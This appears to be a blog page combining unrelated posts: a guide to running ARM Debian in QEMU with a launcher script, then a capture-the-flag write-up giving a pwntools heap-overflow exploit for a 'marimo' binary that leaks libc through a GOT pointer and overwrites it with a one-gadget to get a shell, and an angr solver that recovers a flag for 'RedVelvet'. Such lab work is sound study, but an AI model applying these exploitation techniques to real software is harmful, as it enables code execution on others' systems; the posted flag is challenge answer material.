arm in qemu

system 2018.02.10 18:45

Running ARM Debian in QEMU

# apt-get install qemu

# wget https://people.debian.org/~aurel32/qemu/armhf/debian_wheezy_armhf_standard.qcow2
# wget https://people.debian.org/~aurel32/qemu/armhf/initrd.img-3.2.0-4-vexpress
# wget https://people.debian.org/~aurel32/qemu/armhf/vmlinuz-3.2.0-4-vexpress


* CUI environment + internet access

# qemu-system-arm -M vexpress-a9 \
    -kernel vmlinuz-3.2.0-4-vexpress \
    -initrd initrd.img-3.2.0-4-vexpress \
    -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 \
    -append "root=/dev/mmcblk0p2 console=ttyAMA0" \
    -redir tcp:10022::22 -redir tcp:10080::80 \
    -nographic
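The `-redir` option used above was removed in QEMU 3.1, so the command fails on a current QEMU. The launcher below is an added example, not part of the original post: it starts the same kernel, initrd and qcow2 image with the two port forwards written as `-nic user,hostfwd=...`, bound to 127.0.0.1 so the guest's ssh and http ports are reachable only from the host. It assumes QEMU 2.12 or newer (where `-nic` exists) and that the three downloaded files are in the current directory; `SSH_PORT` and `HTTP_PORT` are environment variables chosen for this example.

```shell
#!/bin/sh
# Added example, not from the original post: launch the Debian wheezy armhf
# image with host port forwards expressed as -nic user,hostfwd=... instead of
# the removed -redir option. Assumes QEMU >= 2.12 and that the three files the
# post downloads are in the current directory.

KERNEL=vmlinuz-3.2.0-4-vexpress
INITRD=initrd.img-3.2.0-4-vexpress
DISK=debian_wheezy_armhf_standard.qcow2
SSH_PORT=${SSH_PORT:-10022}     # host port forwarded to guest port 22
HTTP_PORT=${HTTP_PORT:-10080}   # host port forwarded to guest port 80

# True when $1 is a decimal TCP port number in 1..65535.
is_port() {
    case "$1" in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# True when every file the guest needs is present; names the first missing one.
check_files() {
    for f in "$KERNEL" "$INITRD" "$DISK"; do
        [ -f "$f" ] || { echo "missing: $f" >&2; return 1; }
    done
}

# Print the complete command line on one line so it can be reviewed before it runs.
# The forwards bind to 127.0.0.1, so the guest's sshd/httpd are not exposed on the LAN.
qemu_cmdline() {
    printf '%s' "qemu-system-arm -M vexpress-a9"
    printf ' %s' "-kernel $KERNEL" "-initrd $INITRD"
    printf ' %s' "-drive if=sd,file=$DISK,format=qcow2"
    printf ' %s' "-append 'root=/dev/mmcblk0p2 console=ttyAMA0'"
    printf ' %s' "-nic user,hostfwd=tcp:127.0.0.1:$SSH_PORT-:22,hostfwd=tcp:127.0.0.1:$HTTP_PORT-:80"
    printf ' %s\n' "-nographic"
}

main() {
    is_port "$SSH_PORT" || { echo "bad SSH_PORT: $SSH_PORT" >&2; exit 1; }
    is_port "$HTTP_PORT" || { echo "bad HTTP_PORT: $HTTP_PORT" >&2; exit 1; }
    check_files || exit 1
    echo "+ $(qemu_cmdline)" >&2
    eval "exec $(qemu_cmdline)"
}

# Only start the guest when invoked as "sh arm-qemu.sh run"; otherwise just define the functions.
if [ "${1:-}" = "run" ]; then main; fi
```

Once the guest is up, `ssh -p 10022 root@127.0.0.1` reaches the guest's sshd through the forward, and the guest's console is on the terminal that ran the script (`-nographic` routes ttyAMA0 there).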

Posted by woodonggyu

# exploit.py

from pwn import *
from time import sleep


def ShowMe(name, profile):
    # Create one marimo entry with the given name and profile.
    p.sendline(b'show me the marimo')
    print(p.recvuntil(b'>> '))

    p.sendline(name)
    print(p.recvuntil(b'>> '))

    p.sendline(profile)
    print(p.recvuntil(b'>> '))


def View(index, data):
    # View entry <index>, overwrite its profile with <data>, then go back to the menu.
    p.sendline(b'V')
    print(p.recvuntil(b'>> '))

    sleep(3)

    p.sendline(index)
    print(p.recvuntil(b'>> '))

    p.sendline(b'M')
    print(p.recvuntil(b'>> '))

    p.sendline(data)
    print(p.recvuntil(b'>> '))

    p.sendline(b'B')
    print(p.recvuntil(b'>> '))


def Leak(index):
    # View entry <index>: its profile pointer now points at 0x603018, so the
    # program prints the 6-byte address stored there (puts in libc).
    global puts, oneshot

    p.sendline(b'V')
    print(p.recvuntil(b'>> '))

    p.sendline(index)
    data = p.recvuntil(b'>> ')

    puts = u64(data[82:88].ljust(8, b'\x00'))
    # Offsets are specific to the challenge's libc build.
    libc = puts - 0x6f690
    oneshot = libc + 0x45216

    log.info('puts_libc = ' + hex(puts))
    log.info('libc = ' + hex(libc))
    log.info('oneshot = ' + hex(oneshot))

    p.sendline(b'B')
    print(p.recvuntil(b'>> '))


def exploit(data):
    # Rewrite entry 0 with <data> (which again plants 0x603018 in entry 1),
    # then modify entry 1 so the write lands at 0x603018 with the one-gadget address.
    p.sendline(b'V')
    print(p.recvuntil(b'>> '))

    p.sendline(b'0')
    print(p.recvuntil(b'>> '))

    p.sendline(b'M')
    print(p.recvuntil(b'>> '))

    p.sendline(data)
    print(p.recvuntil(b'>> '))

    p.sendline(b'B')
    print(p.recvuntil(b'>> '))

    p.sendline(b'V')
    print(p.recvuntil(b'>> '))

    p.sendline(b'1')
    print(p.recvuntil(b'>> '))

    p.sendline(b'M')
    print(p.recvuntil(b'>> '))

    p.sendline(p64(oneshot))

    p.interactive()


if __name__ == '__main__':
    p = process('./marimo')

    print(p.recvuntil(b'>> '))

    ShowMe(b'AAAA', b'BBBB')
    ShowMe(b'AAAA', b'BBBB')

    # Write past entry 0's 32-byte profile: fake chunk header (size 0x21) and
    # the pointer 0x603018 for entry 1.
    View(b'0', b'B' * 32 + p64(0x0) + p64(0x21) + p64(0xffffffff) + p64(0x603018))

    Leak(b'1')

    exploit(b'C' * 32 + p64(0x0) + p64(0x21) + p64(0xffffffff) + p64(0x603018) + p64(0x603018))


# exploit.py

import angr


def main():
    # Load only the binary; library calls are handled by angr's SimProcedures.
    proj = angr.Project('./RedVelvet', load_options={'auto_load_libs': False})
    # path_group was removed from angr; simulation_manager is the current API.
    simgr = proj.factory.simulation_manager()
    # Search for a state reaching the success address while pruning the failure paths.
    simgr.explore(find=0x401631, avoid=(0x401621, 0x4016cb))
    # Return what the found state wrote to stdout (fd 1).
    return simgr.found[0].posix.dumps(1)


if __name__ == '__main__':
    print(repr(main()))

The result comes out as "What_You_Wanna_Be?:)_lc_la"; with a bit of guessing, I worked out the exact flag as below.

FLAG : What_You_Wanna_Be?:)_la_la
